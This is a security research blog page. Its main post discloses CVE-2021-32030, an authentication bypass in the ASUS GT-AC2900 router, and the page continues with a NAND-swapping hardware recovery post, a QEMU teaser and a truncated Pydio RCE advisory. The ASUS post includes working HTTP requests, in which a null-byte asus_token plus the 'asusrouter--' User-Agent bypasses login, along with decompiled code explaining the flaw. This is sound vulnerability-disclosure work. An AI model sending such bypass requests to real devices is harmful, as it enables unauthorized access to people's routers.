CVE-2021-32030: ASUS GT-AC2900 Authentication Bypass

In a previous blog post, I presented a creative method for resurrecting a bricked device. In this post, I will go over a vulnerability discovered in the running firmware.

(Atredis has also published an advisory on the vulnerability discussed in this post.)

How it started

When assessing a device, one of the first steps is to gain access to a copy of the software running on the device to assist in the process of understanding how it works. Firmware can be retrieved for a target either by downloading it from the manufacturer or extracting it from the target. In this case, the device manufacturer (ASUS) provides firmware updates. The firmware running on the target at the time of testing can be accessed at the following location:

https://dlcdnets.asus.com/pub/ASUS/wireless/GT-AC2900/FW_GT_AC2900_300438482072.zip

Once the archive is decompressed, the CFE image can be extracted easily with the excellent binwalk tool (ensure that the ubi_reader and jefferson dependencies are installed first):

binwalk -e GT-AC2900_3.0.0.4_384_82072-gc842320_cferom_ubi.w

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
144300        0x233AC         SHA256 hash constants, little endian
144572        0x234BC         CRC32 polynomial table, little endian
276396        0x437AC         SHA256 hash constants, little endian
276668        0x438BC         CRC32 polynomial table, little endian
408492        0x63BAC         SHA256 hash constants, little endian
408764        0x63CBC         CRC32 polynomial table, little endian
540588        0x83FAC         SHA256 hash constants, little endian
540860        0x840BC         CRC32 polynomial table, little endian
672684        0xA43AC         SHA256 hash constants, little endian
672956        0xA44BC         CRC32 polynomial table, little endian
804780        0xC47AC         SHA256 hash constants, little endian
805052        0xC48BC         CRC32 polynomial table, little endian
1048576       0x100000        JFFS2 filesystem, little endian
4456448       0x440000        UBI erase count header, version: 1, EC: 0x0, VID header offset: 0x800, data offset: 0x1000

ls -alh _GT-AC2900_3.0.0.4_384_82072-gc842320_cferom_ubi.w.extracted/
total 130M
drwxrwxr-x 4 chris chris 4.0K Jan 21 20:11 .
drwxrwxr-x 3 chris chris 4.0K Jan 21 20:10 ..
-rw-rw-r-- 1 chris chris  67M Jan 21 20:10 100000.jffs2
-rw-rw-r-- 1 chris chris  64M Jan 21 20:11 440000.ubi
drwxrwxr-x 3 chris chris 4.0K Jan 21 20:11 jffs2-root
drwxrwxr-x 3 chris chris 4.0K Jan 21 20:11 ubifs-root
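
binwalk locates the embedded filesystems by scanning the image for known signatures. As a rough illustration of that idea (not binwalk's actual implementation, which validates far more than a magic value), the sketch below searches a byte string for the "UBI#" magic that begins a UBI erase-count header. The function name and the synthetic image are placeholders made up for this example.

```python
UBI_EC_MAGIC = b"UBI#"  # magic at the start of a UBI erase-count header


def find_magic(blob: bytes, magic: bytes = UBI_EC_MAGIC) -> list:
    """Return every offset in blob at which magic occurs."""
    offsets = []
    pos = blob.find(magic)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(magic, pos + 1)
    return offsets


# Synthetic stand-in for a firmware image: padding followed by one header.
image = b"\xff" * 0x440 + UBI_EC_MAGIC + b"\x01" + b"\x00" * 59
print([hex(offset) for offset in find_magic(image)])
```

On a real UBI image, expect one hit per erase block, since every block starts with its own header; the binwalk output above lists only where the UBI region begins.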

Normally this would be the point where you would start digging for bugs; however, ASUS provides a nice GPL archive for their devices:

https://dlcdnets.asus.com/pub/ASUS/wireless/RT-AC2900/GPL_RT_AC2900_300438640451.zip

The archive contains just about everything you would need to build a working firmware image. The main caveat is that ASUS ships the interesting parts as prebuilt objects instead of the actual source. With that small detour out of the way, we can get back to the bug.

How it’s going

The ASUS GT-AC2900 device's administrative web application utilizes a session cookie (asus_token) to manage session states. While auditing the session handling functionality, I found that the validation of this cookie fails when the following occurs:

  • The submitted asus_token starts with a null byte (0x00)

  • The request User-Agent matches an internal service UA (asusrouter--)

  • The device has not been configured with an ifttt_token (default state)

When these conditions are met, the server incorrectly identifies the request as authenticated. The following example shows a normal request and response for a valid session:

GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=iCOPsFa54IUYc4alEFeOP4vjZrgspAY; clickedItem_tab=0

HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close

{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}

The following shows that the same request fails when an invalid asus_token is provided:

GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter-- 
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=Invalid; clickedItem_tab=0


HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close

{
"error_status":"2"
}

If a Null character is placed at the front of the asus_token, the request will be incorrectly identified as being authenticated, as seen in the following request and response:

GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=\0Invalid; clickedItem_tab=0

HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close

{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}
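
The \0 in the Cookie header above stands for a single 0x00 byte, not the two characters backslash and zero. One way to make that explicit is to assemble the request as raw bytes. The sketch below only builds the request shown above and does not send it; the helper name build_request is made up for this example.

```python
def build_request(host: str, token: bytes) -> bytes:
    """Assemble the raw GET request shown above with an arbitrary asus_token."""
    host_bytes = host.encode("ascii")
    lines = [
        b"GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1",
        b"Host: " + host_bytes,
        b"Content-Length: 0",
        b"User-Agent: asusrouter--",
        b"Connection: close",
        b"Referer: https://" + host_bytes + b"/",
        b"Cookie: asus_token=" + token + b"; clickedItem_tab=0",
    ]
    # Header lines end with CRLF; an empty line terminates the header block.
    return b"\r\n".join(lines) + b"\r\n\r\n"


request = build_request("192.168.1.107:8443", b"\x00Invalid")
print(request)
```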

How it’s actually going

Authentication and validation of requests occur within the function handle_request, specifically through the function auth_check, which can be seen in the following code excerpt from the GPL source archive:

router/httpd/httpd.c - handle_request

static void
handle_request(void)
{
...
...
...
handler->auth(auth_userid, auth_passwd, auth_realm);
auth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp); // <---- call to auth_check in web_hook.o
if (auth_result != 0) 
{
	if(strcasecmp(method, "post") == 0 && handler->input)	//response post request
		while (cl--) (void)fgetc(conn_fp);
        send_login_page(fromapp, auth_result, url, file, auth_check_dt, add_try);
        return;
}
...
...

The auth_check function is implemented in a compiled object (web_hook.o) and verifies that the received session identifier is valid. At a high level, the process breaks down into the following steps:

  • Check that the request cookies contain an asus_token

  • Check if the extracted asus_token exists within the current session list

  • Check if the extracted asus_token is a stored service token (IFTTT/Alexa)

The following decompiled pseudocode shows the underlying code responsible for carrying out this process:

router/httpd/prebuild/web_hook.o - auth_check

int __fastcall auth_check(char *dirname, char *authorization, const char *url, char *file, char *cookies, int fromapp_flag)
{
  void *v7; // r0
  bool v8; // cc
  char *v9; // r5
  int *v10; // r0
  int v11; // r5
  int *v12; // r4
  int v13; // r0
  int v14; // r0
  bool v15; // cc
  char *v16; // r5
  int *v17; // r0
  int result; // r0
  char *pAsusTokenKeyStart; // r0
  char *pAsusTokenValueStart; // r9
  size_t space_count; // r0
  unsigned int v22; // r2
  int *v23; // r0
  int v24; // r5
  int *v25; // r4
  int v26; // [sp+10h] [bp-50h]
  char user_token[32]; // [sp+1Ch] [bp-44h] BYREF

  v7 = memset(user_token, 0, sizeof(user_token));
  v26 = cur_login_ip_type;
...
...
...
  result = auth_passwd;
  if ( auth_passwd )
  {
    // check that the request has a cookie header set and the asus_token cookie exists
    // example header - Cookie: asus_token=iCOPsFa54IUYc4alEFeOP4vjZrgspAY; clickedItem_tab=0
    if ( !cookies || (pAsusTokenKeyStart = strstr(cookies, "asus_token")) == 0 ) // <-----
    {
      // check if this is the first access for initial setup - this is skipped
      if ( !is_firsttime() ) // <-----
      {
        add_try = 0;
        return 1;
      }
      goto PAGE_REDIRECT;
    }
    // find the location of the asus_token value
    pAsusTokenValueStart = pAsusTokenKeyStart + 11; // <-----
    space_count = strspn(pAsusTokenKeyStart + 11, " \t"); // <-----
    
    // set the user_token variable to the extracted value from the user request
    snprintf(user_token, 0x20u, "%s", &pAsusTokenValueStart[space_count]); // <-----
    
    // validate the user_token value, check_ifttt_token returns 1, causing the if statement to be skipped that would normally result in an authentication failure
    if ( !search_token_in_list(user_token, 0) && !check_ifttt_token(user_token) ) // <-----
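
To see why a leading null byte matters here, the strstr / strspn / snprintf sequence can be modeled in Python. This is a sketch of only the lines shown in the excerpt, with C strings approximated as bytes that end at the first 0x00; the helper names c_string_at and extract_token are made up for this example.

```python
def c_string_at(buf: bytes, offset: int) -> bytes:
    """Return the NUL-terminated C string that starts at offset in buf."""
    if offset >= len(buf):
        return b""
    end = buf.find(b"\x00", offset)
    return buf[offset:] if end == -1 else buf[offset:end]


def extract_token(cookies: bytes):
    """Model how auth_check copies the asus_token value into user_token."""
    key_start = c_string_at(cookies, 0).find(b"asus_token")  # strstr
    if key_start == -1:
        return None
    value_start = key_start + 11  # skips "asus_token" plus the "=" after it
    rest = c_string_at(cookies, value_start)
    skipped = len(rest) - len(rest.lstrip(b" \t"))  # strspn(..., " \t")
    return rest[skipped:][:31]  # snprintf into a 32-byte buffer keeps 31 bytes


print(extract_token(b"asus_token=iCOPsFa54IUYc4alEFeOP4vjZrgspAY; clickedItem_tab=0"))
print(extract_token(b"asus_token=\x00Invalid; clickedItem_tab=0"))
```

With the null byte in front, the copy stops immediately and user_token ends up as an empty string, regardless of what follows in the header.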

The check_ifttt_token function compares the user-submitted value to the ifttt_token value stored in the system's NVRAM configuration. The following shows the decompiled pseudocode for this function:

router/httpd/prebuild/web_hook.o - check_ifttt_token

int __fastcall check_ifttt_token(const char *asus_token)
{
  char *ifft_token; // r0
  char *v3; // r0
  int result; // r0
  ifft_token = nvram_safe_get("ifttt_token"); // <----- returns \0

The function nvram_safe_get is used to retrieve the stored ifttt_token value from the system's NVRAM configuration, as seen in the following decompiled pseudocode:

router/httpd/prebuild/web_hook.o - nvram_safe_get
char *__fastcall nvram_safe_get(char* setting_key)
{
  char *result; // r0

  result = nvram_get(setting_key);
  if ( !result )
    result = "\0";
  return result;
}

If the NVRAM configuration does not contain a value for the requested setting, the function returns "\0", which C string functions treat as an empty string. Because the submitted asus_token begins with a null byte, it is also read as an empty string, so the string comparison reports that the values are equal and check_ifttt_token returns true (1), as seen in the following pseudocode:

router/httpd/prebuild/web_hook.o - check_ifttt_token

  ifft_token = nvram_safe_get("ifttt_token"); // <----- returns \0
  if ( !strcmp(asus_token, ifft_token) ) // <----- returns 0 as they match, evals to true and login is successful
  {
    // if the IFTTT_ALEXA log file is enabled, log successful check message
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
      Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] IFTTT/ALEXA long token success.\n", "check_ifttt_token", 760);

    // Return 1
    result = 1; // <----- set result value
  }
  else// <----- skipped
  {
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
      Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] IFTTT/ALEXA long token fail.\n", "check_ifttt_token", 766);
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
      Debug2File(
        "/tmp/IFTTT_ALEXA.log",
        "[%s:(%d)][HTTPD] IFTTT/ALEXA long token is %s.\n",
        "check_ifttt_token",
        767,
        asus_token);
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
    {
      v3 = nvram_safe_get("ifttt_token");
      Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] httpd long token is %s.\n", "check_ifttt_token", 768, v3);
    }
    result = 0;
  }
  return result; // <----- return 1
}
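
The comparison can be reproduced with a small Python model. This is a sketch under the assumption that NVRAM behaves like a key/value store, represented here by a plain dict; the logging branches are omitted, and the dict-based signatures are made up for this example.

```python
def nvram_safe_get(nvram: dict, key: str) -> bytes:
    """Return the stored value, or an empty C string when the key is unset."""
    return nvram.get(key, b"")


def check_ifttt_token(nvram: dict, asus_token: bytes) -> int:
    """Return 1 when the submitted token equals the stored ifttt_token."""
    stored = nvram_safe_get(nvram, "ifttt_token")
    return 1 if asus_token == stored else 0


unconfigured = {}  # default state: no ifttt_token set
print(check_ifttt_token(unconfigured, b"Invalid"))  # ordinary bad token
print(check_ifttt_token(unconfigured, b""))         # token cut short by a leading null byte
```

Once an ifttt_token has been configured, the empty token no longer matches, which is why the bypass depends on the device being in its default state.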

Back in auth_check, the return value of check_ifttt_token causes the if statement to evaluate to false, skipping the code path that would result in a failed authentication attempt and allowing the authentication process to succeed:

router/httpd/prebuild/web_hook.o - auth_check

  if ( !search_token_in_list(user_token, 0) && !check_ifttt_token(user_token) ) // <-----
   {
      if ( !is_firsttime() )
      {
        if ( !strcmp(last_fail_token, user_token) )
        {
          add_try = 0;
        }
        else
        {
          strlcpy(last_fail_token, user_token, 32);
          add_try = 1;
        }
        v23 = _errno_location();
        v24 = *v23;
        v25 = v23;
        if ( f_exists("/tmp/HTTPD_DEBUG") > 0 || nvram_get_int("HTTPD_DBG") > 0 )
          asusdebuglog(6, "/jffs/HTTPD_DEBUG.log", 0, 1, 0, "[%s(%d)]:AUTHFAIL\n\n", "auth_check", 1054);
        result = 2;
        *v25 = v24;
        return result;
      }
PAGE_REDIRECT:
      page_default_redirect(fromapp_flag, url);
      return 0;
    }
...
...
  return result;
}
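
Putting the pieces together, the decision made by this if statement can be sketched as follows. This is a simplified model, not the firmware's code: the add_try bookkeeping and logging are left out, the session list is represented by a set, and the return value of 0 for an accepted token is an assumption about the elided tail of the function, based on handle_request treating any non-zero result as a failure.

```python
AUTH_OK, AUTH_FAIL = 0, 2  # AUTH_OK = 0 is an assumption about the elided code


def auth_decision(user_token: bytes, sessions: set, ifttt_token: bytes,
                  first_time: bool = False) -> int:
    """Model the token check in auth_check for an already extracted token."""
    in_session_list = user_token in sessions      # search_token_in_list
    is_service_token = user_token == ifttt_token  # check_ifttt_token
    if not in_session_list and not is_service_token:
        if not first_time:
            return AUTH_FAIL                      # result = 2 (AUTHFAIL)
        return AUTH_OK                            # PAGE_REDIRECT path returns 0
    return AUTH_OK


sessions = {b"iCOPsFa54IUYc4alEFeOP4vjZrgspAY"}
for token in (b"iCOPsFa54IUYc4alEFeOP4vjZrgspAY", b"Invalid", b""):
    print(token, auth_decision(token, sessions, ifttt_token=b""))
```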

Monitoring the system logs while submitting a malformed asus_token confirms that the token is processed as a successful IFTTT/ALEXA login:

admin@GT-AC2900-3711:/jffs# tail -f /tmp/IFTTT_ALEXA.log
[check_ifttt_token:(1014)][HTTPD] IFTTT/ALEXA long token success.

How it ends

ASUS has released an updated firmware image that addresses this vulnerability; it can be downloaded from their support site.

NANDcromancy: Live Swapping NAND Flash

Often when assessing an embedded system, changes can occur (intended or otherwise) that cause the target system to enter a state where it no longer works ('bricked'). In some cases, fixing the target is as simple as performing a "factory reset"; other cases may be slightly more involved and require flashing the target using a debug interface (JTAG/SWD/*) or manually flashing an external storage device (SPI/NOR/NAND/eMMC). This post walks through resolving a situation where a target has been 'bricked', using a creative methodology.

During some downtime, I was poking at an off-the-shelf consumer router that uses the Common Firmware Environment (CFE) as its boot loader. While I was interacting with the CFE to identify the arguments that are passed to the target's operating system at boot, the system configuration was accidentally corrupted:

CFE> b
Press:  <enter> to use current value
        '-' to go previous parameter
        '.' to clear the current value
        'x' to exit this command
94908AC5300R               ------ 03
94906REF                   ------ 07
GT-AC2900                  ------ 08
Board Id                          :  8  X     <---- whoops
Number of MAC Addresses (1-64)    :  10  ^C   <---- more whoops
x
Memory Configuration Changed -- REBOOT NEEDED <---- whoops saved. 
flow memory allocation (MB)       :  14  ----

At this point I figured a final save/write would be required to commit the accidental changes, so I opted to just power cycle the device to avoid making permanent changes. After power cycling the device, an error occurred:

Shmoo WR DM
WR DM
   0000000000111111111122222222223333333333444444444455555555556666666666
   0123456789012345678901234567890123456789012345678901234567890123456789
00 ------++++++++++++++++++++++++++X+++++++++++++++++++++++++++----------
01 --+++++++++++++++++++++++++X++++++++++++++++++++++++++----------------
02 X---------------------------------------------------------------------
03 X---------------------------------------------------------------------
MEMSYS init failed, return code 00000001
MEMC error:  0x00000000
PHY error:  0x00000000
SHMOO error:  0x10c00000 
 0x00000082
 0x00000000

When the device came back up, it immediately produced the previous error and failed to enter the CFE. Without being able to access the boot loader, the configuration could not be changed and the boot loader's recovery process could not be utilized either. Searching online for this error was not helpful and resulted in dead ends; the general consensus is that if you corrupt CFE in this manner, the device is 'bricked'. At this point I switched to working with my backup device (always have a backup) so I could answer my original question regarding interesting target arguments. As an aside, the setting kernp mfg_nvram_mode=1 mfg_nvram_url=BADURL is particularly interesting.

Later on I circled back to the bricked unit to identify a path to fix it. The target is using a Broadcom SoC and an unpopulated header was found to provide JTAG access:

1.png

After enumerating the JTAG pinout on the unpopulated header with a JTagulator, it was possible to confirm access using OpenOCD:

$ openocd -f ../interface/jlink.cfg -f bcm49.cfg
Open On-Chip Debugger 0.11.0-rc2+dev-gba0f382-dirty (2021-02-26-14:07)
Licensed under GNU GPL v2
For bug reports, read
    http://openocd.org/doc/doxygen/bugs.html
DEPRECATED! use 'adapter speed' not 'adapter_khz'
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : J-Link V10 compiled Dec 11 2020 15:39:30
Info : Hardware version: 10.10
Info : VTarget = 3.323 V
Info : clock speed 1000 kHz
Info : JTAG tap: bcm490x.tap tap/device found: 0x5ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x5)
Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x4)
Info : JTAG tap: auto1.tap tap/device found: 0x0490617f (mfg: 0x0bf (Broadcom), part: 0x4906, ver: 0x0)
Info : JTAG tap: auto2.tap tap/device found: 0x0490617f (mfg: 0x0bf (Broadcom), part: 0x4906, ver: 0x0)
Info : bcm490x.a53.0: hardware has 6 breakpoints, 4 watchpoints
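
The manufacturer, part, and version values OpenOCD prints are packed into each 32-bit IDCODE. A short sketch of the standard JTAG IDCODE layout (bit 0 is always 1, bits 1-11 hold the manufacturer ID, bits 12-27 the part number, bits 28-31 the version) reproduces the values in the log above; the function name is made up for this example.

```python
def decode_idcode(idcode: int) -> dict:
    """Split a 32-bit JTAG IDCODE into its standard fields."""
    return {
        "version": (idcode >> 28) & 0xF,
        "part": (idcode >> 12) & 0xFFFF,
        "manufacturer": (idcode >> 1) & 0x7FF,
    }


for idcode in (0x5BA00477, 0x4BA00477, 0x0490617F):
    fields = decode_idcode(idcode)
    print(hex(idcode), {name: hex(value) for name, value in fields.items()})
```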

The other path for restoring the system is through the storage device, a Macronix NAND chip:

2.png

At this point I started to wonder: I still had a working device that I could boot into the boot loader. Would it be possible to swap the NAND chip on a running device and use it to flash the corrupted NAND?

Before attempting anything, I asked a co-worker if he thought this stupid idea would have any chance of working. He wasn't optimistic about the outcome (to be fair, I wasn't either), so we made a bet on the results and I went to work.

The first stage of testing was to find out whether the system would tolerate having the NAND 'removed' while running. I knew that answering this question would require being more methodical than just hitting the unit with hot air while it's running and removing the chip. The first step was to identify how the NAND is powered. From the layout, VCC appears to be tied into the chip in the following locations:

NAND Power Sources

With the VCC lines identified, the easiest way to answer our first question would be to remove the VCC lines from the NAND while the system is running. In order to do this, my first try was to cut the VCC lines and add 'jumper' wires (36 AWG Magnet Wire is great stuff) that can be disconnected once the boot loader is done:

Initial VCC Jumper Locations

On the right hand side I chose to cut further back on the power trace thinking it would be a better spot as it feeds into a few pins on the NAND. On the first jumper install I used a fiberglass scratch pen to remove the coating and expose the copper and a small knife to cut the trace:

Terrible Jumper Install

The result was gross, as the scratch pen tip was far too big and I ended up exposing lots of copper. Don't use a scratch pen; a fine-tipped knife alone avoids the mess. More like this:

6.png
7.png

With the 'jumpers' installed and connected, the target was powered up to the boot loader (CFE) and the command dn (dump nand) was used to ensure the NAND was accessible. Power was then removed by disconnecting the jumper wires:

CFE> dn
------------------ block: 0, page: 0 ------------------
00000000: 00000000 00000000 00000000 00000000    ................
00000010: 00000000 00000000 00000000 00000000    ................
00000020: 00000000 00000000 00000000 00000000    ................
<CUT FOR LENGTH>

----------- spare area for block 0, page 0 -----------
00000800: ff851903 20000008 00fff645 c2b9bf55    .... ......E...U
00000810: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000820: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000830: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.

*** command status = 1
CFE>
web info: Waiting for connection on socket 1.␛[J
CFE>
web info: Waiting for connection on socket 0.␛[J
CFE> ␀----       <----- VCC Removed (reboot)

When the power was removed (marked with 'VCC Removed'), the target rebooted and failed to return to the boot loader as the NAND was not accessible. The source of the problem was that the right-side power cut was in a spot that removed power from the SoC as well as the NAND. Keeping it simple, the initial cut was restored and only the trace closest to the NAND was cut and jumpered:

8.png

Bringing the system back up and attempting the previous test gave me the answer to my initial question: when the power is removed by disconnecting the jumper wires, the system remains operational, as confirmed by running the dn command:

<----- NAND VCC Removed 
CFE> dn
------------------ block: 0, page: 2 ------------------
Status wait timeout: nandsts=0x30000000 mask=0x80000000, count=2000000
Error reading block 0
00001000: 00000000 00000000 00000000 00000000    ................
<CUT FOR LENGTH>
Status wait timeout: nandsts=0x30000000 mask=0x80000000, count=2000000
----------- spare area for block 0, page 2 -----------
00000800: 00000000 00000000 00000000 00000000    ................
00000810: 00000000 00000000 00000000 00000000    ................
00000820: 00000000 00000000 00000000 00000000    ................
00000830: 00000000 00000000 00000000 00000000    ................
Error reading block 0 
*** command status = -1      <----- Expected error reading NAND 
CFE>
CFE>
CFE>
<----- NAND VCC Enabled 
CFE>
CFE> dn
------------------ block: 0, page: 3 ------------------
00001800: 00000000 00000000 00000000 00000000    ................
00001810: 00000000 00000000 00000000 00000000    ................
<CUT FOR LENGTH>
----------- spare area for block 0, page 3 -----------
00000800: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000810: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000820: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000830: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
*** command status = 1      <----- Successful NAND read
CFE>

Having confirmed that it is possible to 'turn off' the NAND on the running system without disrupting the boot loader, the next step was to try to power down the NAND and physically remove it from the board while the system was running.

Using hot air and tweezers, one side was lifted at a time (right side then left):

9.png

This process resulted in the system restarting and failing to enter the boot loader:

CFE> ␀----    <----- NAND Removed (reboot)
BTRM
V1.6
CPU0
L1CD
MMUI
MMU7
DATA
ZBBS
MAIN
OTP?
OTPP
USBT
NAND
IMG?
FAIL
␀----         <----- FAIL boot loop

Since I had lifted the NAND off one side at a time while monitoring the console it was easy to see that the reboot occurred when lifting the "left" side of the NAND:

10.png

The most likely culprits were the Read Enable (RE#) or Ready/Busy (R/B#) pins changing state. To test this, jumper wires were added to both:

11.png

At this point the NAND had to be placed back on the board in order to return the system to the boot loader. The NAND was once again powered down by disconnecting the VCC jumpers, and the RE# and R/B# lines were held low by attaching them to ground:

12.png

The NAND was again removed, working one side at a time while monitoring the boot loader console:

13.png

This time the boot loader remained active and the system did not reboot. With one more part of the puzzle completed it was time to move on to the next step - attaching the corrupted NAND to the running target.

Once again hot air was used to solder the replacement NAND to the target. The first attempt was unsuccessful, as some pins were shorted when trying to get the alignment right on both sides. As encountered previously, failure at this point requires starting the entire process over again: the replacement NAND had to be removed and the original had to be placed back on the board.

For the second attempt, a small piece of paper was used to insulate one side of the NAND while the other was aligned and attached with hot air:

14.png

Once the first side was attached, the paper was removed and the other side was attached. The boot loader remained active once the new NAND was in place. The next step was to re-enable the RE# and R/B# pins by removing the ground jumper wires, and finally the VCC jumper was reattached. Once everything was reconnected, the dn command was used again to confirm that the NAND was available:

CFE> dn
------------------ block: 0, page: 0 ------------------
00000000: 00000000 00000000 00000000 00000000    ................
00000010: 00000000 00000000 00000000 00000000    ................
00000020: 00000000 00000000 00000000 00000000    ................
<CUT FOR LENGTH>
----------- spare area for block 0, page 0 -----------
00000800: ff851903 20080000 00c2b822 c978ff97    .... ......".x..
00000810: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000820: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000830: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.

*** command status = 1   <----- Success!
CFE>

With a successful test read completed, the factory firmware image was loaded through the boot loader's web interface:

web info: Waiting for connection on socket 1.␛[J
web info: Upload 70647828 bytes, flash image format.␛[J   <----- Image Upload
CFE> ........

Setting JFFS2 sequence number to 13

Flashing root file system at address 0x06000000 (flash offset 0x06000000): <-----Image Write
.................................................................... .....................................................................
....................................................................
....................................................................
....................................................................
....................................................................
....................................................................
....................................................................
Resetting board in 0 seconds...␀----
BTRM
V1.6
CPU0
L1CD
MMUI
MMU7
DATA
ZBBS
MAIN
OTP?
OTPP
USBT
NAND
IMG?
IMGL
UHD?
UHDP
RLO?
RLOP
UBI?
UBIP
PASS    
----
<CUT FOR LENGTH>
CFE version 1.0.38-161.122 for BCM94908 (64bit,SP,LE)
Build Date: Mon May 13 08:23:21 CST 2019 (defjovi@ubuntu-eva02)
Copyright (C) 2000-2015 Broadcom Corporation.

Boot Strap Register:  0x6fc42
Chip ID: BCM4906_A0, Broadcom B53 Quad Core: 1800MHz
Total Memory: 536870912 bytes (512MB)
Status wait timeout: nandsts=0x50000000 mask=0x40000000, count=0
NAND ECC BCH-4, page size 0x800 bytes, spare size used 64 bytes
NAND flash device: , id 0xc2da block 128KB size 262144KB
<CUT FOR LENGTH>
Initalizing switch low level hardware.
pmc_switch_power_up: Rgmii Tx clock zone1 enable 1 zone2 enable 1.
Software Resetting Switch ... Done.
Waiting MAC port Rx/Tx to be enabled by hardware ...Done
Disable Switch All MAC port Rx/Tx
*** Press any key to stop auto run (1 seconds) ***
Auto run second count down: 0
Booting from only image (address 0x06000000, flash offset 0x06000000) ...  <----- Success!!111!
Decompression LZMA Image OK!
Entry at 0x0000000000080000
Starting program at 0x0000000000080000
/memory = 0x20000000
Booting Linux on physical CPU 0x0
Linux version 4.1.27 (jenkins@asuswrt-build-server) (gcc version 5.3.0 (Buildroot 2016.02) ) #2 SMP PREEMPT Fri Jun 19 13:05:44 CST 2020
CPU: AArch64 Processor [420f1000] revision 0
Detected VIPT I-cache on CPU0

As shown in the output, the flash was successful and the system booted into the target operating system.
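
The addresses in the dn dumps and in the flash messages follow directly from the NAND geometry CFE reports at boot (page size 0x800 bytes, block 128KB, size 262144KB). The arithmetic can be checked with a few lines; the constant and function names below are made up for this example.

```python
PAGE_SIZE = 0x800            # "page size 0x800 bytes"
BLOCK_SIZE = 128 * 1024      # "block 128KB"
DEVICE_SIZE = 262144 * 1024  # "size 262144KB"

PAGES_PER_BLOCK = BLOCK_SIZE // PAGE_SIZE
TOTAL_BLOCKS = DEVICE_SIZE // BLOCK_SIZE


def page_offset(block: int, page: int) -> int:
    """Byte offset of a page's data area from the start of the flash."""
    return block * BLOCK_SIZE + page * PAGE_SIZE


def block_of(offset: int) -> int:
    """Index of the erase block that contains a flash offset."""
    return offset // BLOCK_SIZE


print(PAGES_PER_BLOCK, TOTAL_BLOCKS)
print(hex(page_offset(0, 2)), hex(page_offset(0, 3)))  # the two later dn dumps
print(block_of(0x06000000))  # block where the root file system was flashed
```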

I am sure some reading this will say, "why not use $device_name_here chip reader/writer to reprogram the NAND?", which is an absolutely fair question and probably makes more sense than this nonsense; however, I believe the fitting quote to reference here is one by the famous chaos theory mathematician:

'Your scientists were so preoccupied with whether they could, they didn't stop to think if they should'

- Dr. Jeffrey Goldblum

QEMU and U: Whole-system tracing with QEMU customization

QEMU is a key tool for anyone searching for bugs in diverse places. Besides opening the doors to expensive or opaque platforms, QEMU has several internal tools that give developers further insight and control. Researchers comfortable modifying QEMU have access to powerful inspection capabilities. We will walk through a recent custom addition to QEMU to highlight some helpful internal tools and demonstrate the power of a hackable emulator.

Authenticated RCE in Pydio (Forever-Day) -- CVE-2020-28913

Pydio (formerly AjaXplorer) is an open source web application for remotely managing and sharing files. Users may upload files to the server and then share them via public links, much as Google Drive, Dropbox, and other cloud services do.

By sending a file copy request with a special HTTP variable used in code, but not exposed in the web UI, an attacker can overwrite the .ajxp_meta file. The .ajxp_meta file is a serialized PHP object written to the user’s directory and is deserialized when Pydio needs information about files it stores.

POST /pydio/index.php? HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/pydio/ws-my-files/
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://example.com
Content-Length: 124
Connection: close
Cookie: AjaXplorer=ak7jio5pphe6onko1gcofj05k4

